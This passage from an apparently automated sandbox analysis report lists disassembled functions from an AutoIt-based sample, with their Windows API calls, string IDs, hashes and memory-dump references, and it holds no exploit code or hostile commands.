                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                                                                                                          • Opcode ID: 5d7fb40513662fa5a9a79d10ee5eb5784a3385cf4769a86d80f2c04c319d0f7d
                                                                                                                                                                                                                                          • Instruction ID: 24dc3d46838be325203bd8d7e706a5f16c6cb9a07bb009a372ee9a46024ff2a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d7fb40513662fa5a9a79d10ee5eb5784a3385cf4769a86d80f2c04c319d0f7d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CD1C271A0060ADFDF14CF98C891BAEB7B6BF48344F148069E925AF281D770DD49CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00111522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001117FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001115CE
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00111651
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001117FB,?,001117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001116E4
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001116FB
                                                                                                                                                                                                                                            • Part of subcall function 00103820: RtlAllocateHeap.NTDLL(00000000,?,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6,?,000D1129), ref: 00103852
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00111777
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 001117A2
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 001117AE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2829977744-0
                                                                                                                                                                                                                                          • Opcode ID: 4099b1042dfe6fbd04bc32f363c305c3553675736635c4b94b0f0815fe0ef3fb
                                                                                                                                                                                                                                          • Instruction ID: fea4e78e8df42f3a60ef53c6afc1802fa2f212d26abe481d5adee665e7ce5e1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4099b1042dfe6fbd04bc32f363c305c3553675736635c4b94b0f0815fe0ef3fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB91A672E00215BEDB288E64DC41AEEFBB6AF49310F194679EA01E7281D775DCC0CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00154523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                          • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                          • Opcode ID: feaa147b1019e8ededee4bb22c1e57074e4e3bbe8a4ea5b681143c581e71da26
                                                                                                                                                                                                                                          • Instruction ID: 15b9d982f126fcd1e57dde76bf8e3372df4a613312212c9ebb8faf6ede34a5dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: feaa147b1019e8ededee4bb22c1e57074e4e3bbe8a4ea5b681143c581e71da26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3591A171A00215EBDF24CFA5C844FAE7BB8EF45719F108559F925AF280D7709989CFA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00141187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0014125C
                                                                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00141284
                                                                                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001412A8
                                                                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001412D8
                                                                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0014135F
                                                                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001413C4
                                                                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00141430
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2550207440-0
                                                                                                                                                                                                                                          • Opcode ID: c7b602210da7a490157360144e39e49476ffac5a4c32eb16ad542ff5d0157423
                                                                                                                                                                                                                                          • Instruction ID: 3cd7c033caa369c39476db11932da2060f23822dcca2e115f909a44b3c752d29
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7b602210da7a490157360144e39e49476ffac5a4c32eb16ad542ff5d0157423
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB91F676A00219AFDB00DFA4C884BFEB7B5FF44325F254029E940E72A2D774E981CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3225163088-0
                                                                                                                                                                                                                                          • Opcode ID: 1d5e0b7189918adece394408ca97c92e52d00e7eab2407042e2a432739083508
                                                                                                                                                                                                                                          • Instruction ID: ba83bb4b0734f063159b5f823ebfae463f519babc49bccd2d006672bb7a068d4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d5e0b7189918adece394408ca97c92e52d00e7eab2407042e2a432739083508
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC913771D00219EFCB15CFAACC84AEEBBB8FF49320F148559E515B7291D774A981CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00153947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0015396B
                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00153A7A
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00153A8A
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00153C1F
                                                                                                                                                                                                                                            • Part of subcall function 00140CDF: VariantInit.OLEAUT32(00000000), ref: 00140D1F
                                                                                                                                                                                                                                            • Part of subcall function 00140CDF: VariantCopy.OLEAUT32(?,?), ref: 00140D28
                                                                                                                                                                                                                                            • Part of subcall function 00140CDF: VariantClear.OLEAUT32(?), ref: 00140D34
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                          • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                          • Opcode ID: ff0c7f1f250a87a702e79b9a3cbf6680bfdea77ae33b8fedf3da786176e9705b
                                                                                                                                                                                                                                          • Instruction ID: ad018492404ef2dd4948fd8dfd0c30e45d1bae450b794db4e0f2d67e5debffdc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff0c7f1f250a87a702e79b9a3cbf6680bfdea77ae33b8fedf3da786176e9705b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1916674608305DFCB04DF24C48096AB7E4BF89355F04892EF8A99B352DB31EE49CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00154BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0013000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?,?,0013035E), ref: 0013002B
                                                                                                                                                                                                                                            • Part of subcall function 0013000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?), ref: 00130046
                                                                                                                                                                                                                                            • Part of subcall function 0013000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?), ref: 00130054
                                                                                                                                                                                                                                            • Part of subcall function 0013000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?), ref: 00130064
                                                                                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00154C51
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00154D59
                                                                                                                                                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00154DCF
                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00154DDA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                          • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                          • Opcode ID: 961213475674e89727581bf225b2279edf952965c0b833568daaf500da9ae7cf
                                                                                                                                                                                                                                          • Instruction ID: 8df95c232ae93ab77d93179697a9007da5aa494e3226e49ae62141252c1ae27d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 961213475674e89727581bf225b2279edf952965c0b833568daaf500da9ae7cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43910771D00219DFDF14DFA4D891AEEB7B9FF08314F10416AE925AB251DB749A48CFA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001620FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 00162183
                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 001621B5
                                                                                                                                                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001621DD
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00162213
                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 0016224D
                                                                                                                                                                                                                                          • GetSubMenu.USER32(?,?), ref: 0016225B
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00133A57
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: GetCurrentThreadId.KERNEL32 ref: 00133A5E
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001325B3), ref: 00133A65
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001622E3
                                                                                                                                                                                                                                            • Part of subcall function 0013E97B: Sleep.KERNEL32 ref: 0013E9F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4196846111-0
                                                                                                                                                                                                                                          • Opcode ID: fad3a60d2a292376504dbcb600e0722ffc372aca713aded30886cd177b44d428
                                                                                                                                                                                                                                          • Instruction ID: 49200f1a470b44e20c86dd78210aefe1888ee0651df7dd60278c003e8ba939e4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fad3a60d2a292376504dbcb600e0722ffc372aca713aded30886cd177b44d428
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5718D75A00605AFCB14DFA8CC45AAEB7F1EF48310F158469E816EB341DB74AE418BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00167E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsWindow.USER32(010955B8), ref: 00167F37
                                                                                                                                                                                                                                          • IsWindowEnabled.USER32(010955B8), ref: 00167F43
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0016801E
                                                                                                                                                                                                                                          • SendMessageW.USER32(010955B8,000000B0,?,?), ref: 00168051
                                                                                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 00168089
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(010955B8,000000EC), ref: 001680AB
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001680C3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4072528602-0
                                                                                                                                                                                                                                          • Opcode ID: 0ad1cea005e095574e5b962b966af7e531345cf96bcf53029552236cbf81243b
                                                                                                                                                                                                                                          • Instruction ID: d53cc734b812db1d58b82c8537cee491f081d34dc0dcd6ff3065eb523c2cb602
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ad1cea005e095574e5b962b966af7e531345cf96bcf53029552236cbf81243b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE71B034608204AFEF219F64CC84FFABBB5EF1A304F144499F965972A1CB71AC64CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 0013AEF9
                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0013AF0E
                                                                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0013AF6F
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0013AF9D
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0013AFBC
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 0013AFFD
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0013B020
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                                                                                          • Opcode ID: ac7b2bc8e8e88857bd4a1bb1db960db95a9944dd7c39484299fb881b5ff8972a
                                                                                                                                                                                                                                          • Instruction ID: b4a6db2d87f9b562e4401d5a9b4d1ae4eafa8483e9312142ee43c1ce09a11844
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac7b2bc8e8e88857bd4a1bb1db960db95a9944dd7c39484299fb881b5ff8972a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 245192A06087D53DFB364234CC85BBBBEA95F06304F088589F2D9998D2D3D9ACC8D751
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetParent.USER32(00000000), ref: 0013AD19
                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0013AD2E
                                                                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0013AD8F
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0013ADBB
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0013ADD8
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0013AE17
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0013AE38
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                                                                                          • Opcode ID: 2340b83fed55d180799786e310cee05ec8388a57dbdfba911f92d5d65cbbcb75
                                                                                                                                                                                                                                          • Instruction ID: fca950b2d1f269bc475a68125b4b9d1b50d5b4705de027375da3f25b37f36756
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2340b83fed55d180799786e310cee05ec8388a57dbdfba911f92d5d65cbbcb75
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF5118A16487D53DFB378374CC95BBABEA85F46300F488598E1D54A8C3D394EC88D762
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(00113CD6,?,?,?,?,?,?,?,?,00105BA3,?,?,00113CD6,?,?), ref: 00105470
                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 001054EB
                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00105506
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00113CD6,00000005,00000000,00000000), ref: 0010552C
